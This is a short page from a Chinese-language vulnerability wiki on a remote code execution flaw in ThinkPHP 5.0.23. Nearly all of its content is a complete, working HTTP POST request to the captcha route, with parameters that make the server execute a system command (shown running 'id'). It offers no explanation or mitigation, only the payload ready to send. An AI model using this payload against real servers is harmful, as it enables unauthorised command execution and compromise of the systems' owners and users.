Loading
0

ThinkPHP5 5.0.23远程代码执行漏洞

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

漏洞利用

发送数据包:

POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter=system&method=get&serverREQUEST_METHOD=id

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库